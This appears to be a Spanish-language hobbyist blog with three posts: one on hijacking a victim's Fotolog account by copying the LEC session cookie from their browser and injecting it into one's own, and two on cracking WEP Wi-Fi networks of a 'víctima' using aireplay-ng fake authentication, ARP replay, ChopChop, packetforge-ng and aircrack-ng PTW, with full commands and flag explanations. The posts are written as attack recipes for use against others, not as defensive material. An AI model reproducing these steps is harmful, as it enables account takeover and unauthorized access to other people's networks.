jueves, 21 de febrero de 2008

como hackear fotolog

oooooola a todos, en este articulo voi a mostrar una forma de entrar a la cuenta fotolog de alguien, aunque lo haremos de forma que en ningun memento conoceremos la contraseña de nuestra victima, esto lo haremos utilizando una vieja tecnica de hacking, la suplantación de cookies.

no voi a explicar lo que es una cookie, para eso existe google, pero estas guardan información acerca de nuestra sesión.

en primer lugar, debemos encontrar la cookie de nuestra víctima, para esot conozco 3 formas:

  • snifeando información con wireshark, aunque no es muy util, pero me ha funcionado, aunque la victima tiene que estar conectada en la misma subred que uno aunque utilizando técnicas de penetración wireless es posible y aún mas utilizando arpjutsu un programa hecho por mi que permite redirecionar el trafico de red haciendo la captura mas eficaz................... esta técnica no la veremos debido a su complejidad...por lo menos ahora.
  • utlizando técnicas de "cross site scripting" (XSS) es un poco mas facil pero requiere conocimiento basicos de programación en php y es necesario saber montar nuestro propio servidor web...........tampoco veremos esta.
  • esta si, solo buscaremos la cookie en el navegador de nuestra victima...para eso necesitaremos tener acceso al pc de nuestra victima o algun pc en el que se halla logueado.
personalmente pienso que la segunda es mas elegante y da mejores resultados que cualquiera pero les he dicho mucho con eso de XSS + google + dejar_de_pajearse_y_leer podran hecerlo ud solos.


veremos el tercer paso.....

vamos al firefox de nuestra victima, en el menú Editar -> Preferencias
luego en el icono que dice privacidad encontraremos un boton que dice "mostrar cookies"
aparecerá una ventana
debemos copiar el contenido de la cookie llamada LEC del sitio fotolog.com y guardarlo, puede ser enviar el contenido a nuestro email.

cuando lleguemos a la casita instalaremos un componente a nuestro firefox llamado "Web developer toolbar"
ahora entraremos a nuestra cuenta fotolog, en la barra de herramientas aparecerán mucho botones....hacemos click en cookies -> view cookie information
se abrira una nueva pestaña mostrando todas nuestras cookies, buscaremos la que tiene como nombre LEC, haremos click en editar u luego reemplazaremos el campo value con el valor robado de nuestra victima.

volvemos a nuestra pestaña de fotolog y pulsamos el boton recargar o apretando F5 y veremos en la esquina superior derecha que nuestro nombre de usuario ha cambiado por el de nuestra victima.

espero que esta wea les halla servido. quizas escriba algo acerca de la seguna técnica.....no se queden con esto...esa tecnica sirve para caleta de otras paginas.

chop.....si me ven me sacan 1..

lunes, 24 de diciembre de 2007

Ataque KOREK ChopChop

Como una continuación del articulo anterior de ataques "no client", en el cual utilizamos el ataque arp-replay, aveces este ataque puede demorar mucho...hasta un dia o mas en capturar un arp, en estos casos es mejor utilizar el ataque ChopChop, el cual obtiene un producto cruzado(PRGA) de un paquete, para luego tomar el contenido de este y utilizarlo para crear un paqute arp, el que luego injectaremos en la red victima con el fin de generar trafico de red.

como siempre comenzaremos capturando los paquetes con el airodump, identificando el canal en el cual se encuentra la victima.

bash-3.1# airodump-ng ath0 --channel 11 -w captura

luego es necesario crear una autenticación falsa, como habiamos visto en el ejemplo anterior, esto lo hacemos:

aireplay-ng ath0 --fakeauth 20 -e KENOBII -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 :interface
--fakeauth 20 :especifica el ataque y establece la peridicidad de este
-e KENOBII :ESSID, en este caso KENOBII
-a 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC

El comando anterior nos debe mostrar algo así
Ahora es el momento de empezar con el ataque chopchop, y esto lo hacemos utilizando la siguiente linea de comandos:

aireplay-ng ath0 --chopchop -b 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX

ath0 :interface
--chopchop :especifica el ataque
-b 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC

en este momento el programa comienza a leer paquetes
al encontrar un que nos sive nos preguntará, en este momento es necesario fijarnos que el Dest. MAC = FF:FF:FF:FF:FF:FF , ya que esto nos indica que es un broadcast, y esto nos servirá mas adelante
al terminar de "decriptar" el paquete nos muestra algo así:
en algunos manuales he leido que abren el archivo .xor con el tcpdump, con el fin de encontrar una ip que nos de el rango de ip que usa esta red, en este caso yo no hare eso, sinó que creare un arp directamente al broadcast.

root@darkstar:~/chopchop# packetforge-ng --arp -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1224-150656.xor -w pakete.cap

donde:

--arp :especifica que creara un arp
-a 00:11:50:XX:XX:XX :especifica la mac de la victima
-h 00:17:9A:XX:XX:XX :mi MAC
-k 255.255.255.255 :ip de destino...(para el caso broadcast)
-l 255.255.255.255 :ip del remitente...=broadcast
-y XXX.xor :archivo PRGA..lo obtenemos del ataque chopchop
-w pakete.cap :archivo donde guardaremos nuestro arp

ahora es el momento de mandar nuestro arp, para generar el trafico, esto lo hacemos así:

root@darkstar:~/chopchop# aireplay-ng ath0 --interactive -r pakete.cap

donde:
ath0 : interface
--interactive : ataque
-r pakete.cap : lee desde el archivo pakete.cap

esto nos mostrará lo siguiente
al enviar el paquete, podemos observar en la ventana de captura un inmenso trafico de información a alta velocidad
Esto nos permitirá, en cosa de minutos, obtener la cantidad de paquetes necesarios para poder crackear la red con aircrack, como el uso de aircrack es relativamente sencillo y ademas se encuentra en el manual anterior, dejaremos este manual asta asqui, espero les halla servido.

chop

sábado, 22 de diciembre de 2007

Ataques "no client" a redes wifi (WEP)

La mala suerte me persigue, he aprendido a obtener las calves de redes con WEP pero no tengo trafico de red o muy poco, en este texto vamos a ver como generar este trafico de red por medio del ataque arp replay y fake auth, el arp es address resolution protocol...pero NO vamos a explicar como funciona, para eso existe google.

cabe destacar que en este artaque solo funcionará si el arp es para el broadcast.

En este articulo NO vamos a comenzar hablando sobre el hardware de red a utilizar, tampoco sobre la instalación de drivers y respectivos parches, sin embargo es necesario indicar que la tarjeta utilizada en estos ejemplos es una DWL-520 con chipset atheros 5112, usando drivers MadWifi-ng 0.9.3 y Aircrack 0.9.1.

comenzando por el principio vamos a poner nustra wireless en modo monitor

bash-3.1# wlanconfig ath0 destroy
bash-3.1# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bash-3.1#

luego ejecutaremos airodump-ng seguido del nombre de la interface con el fin de buscar una victima

en este caso la red victima será sandokhan, es necesario para una buena captura fijarnos en el canal en el que transmite dicha red.

ahora ejecutaremos el airodump especificando el canal y el archivo donde se guardará nuestra captura

bash-3.1# airodump-ng ath0 --channel 2 -w captura


ahora tenemos el proceso de captura listo, ahora prepararemos los siguientes ataques

- ataque arp replay
- ataque fake auth

persnalmente prefiero hacer el ataque arp replay antes que el otro, me ha dado mejores resultados.

la linea de comando para el ataque es:

bash-3.1# aireplay-ng ath0 --arpreplay -b 00:17:9A:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 <---interface --arpreplay <--- especifica el ataque -b 00:17:9A:XX:XX:XX <--- MAC del AP victima -h 00:17:9A:XX:XX:XX <--- mi MAC (cabe destacar que por coincidencia mi mac es parecida a la de la victima, probaplemente por que mi tarjeta es de la misma marca que la del AP) esto dará un resultado así

ahora realizamos el ataque fake auth, el cual, como su nombre lo dice crea una falsa autenticación con el AP.

esto lo hacemos de la siguiente forma:

bash-3.1# aireplay-ng ath0 --fakeauth 20 -e sandokhan -a 00:17:9A:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 <---interface --fakeauth 20 <--- establece el ataque y le dice que lo haga cada 20 segundos -e sandokhan <--- establece el nombre de la red o ESSID -b 00:17:9A:XX:XX:XX <--- MAC del AP victima -h 00:17:9A:XX:XX:XX <--- mi MAC tendremos algo así

ahora esperamos a que el AP se digne a enviarnos un arp, cuando esto suceda
nuestro ataque enviará una respuesta a ese arp pero pidiendo otro arp, lo que nos dará nuestro preciado trafico de red.

al suceder esto tendremos algo así

además podremos observar que se ha generado trafico de red.

al llegar a por sobre los 10000 paquetes comenzaremos a crackear usando el ataque PTW.

bash-3.1# aircrack-ng -z captura-01.cap

donde -z establece el ataque PTW, el cual es mas rapido ya que requiere menor cantidad de paquetes.

al terminar tendremos algo así

donde tendremos nuestra preciada clave

agradecería cualquier consulta, duda, correción o chuchada
espero esto le sirva a alguien.
chop ------pantalondemilico at hotmail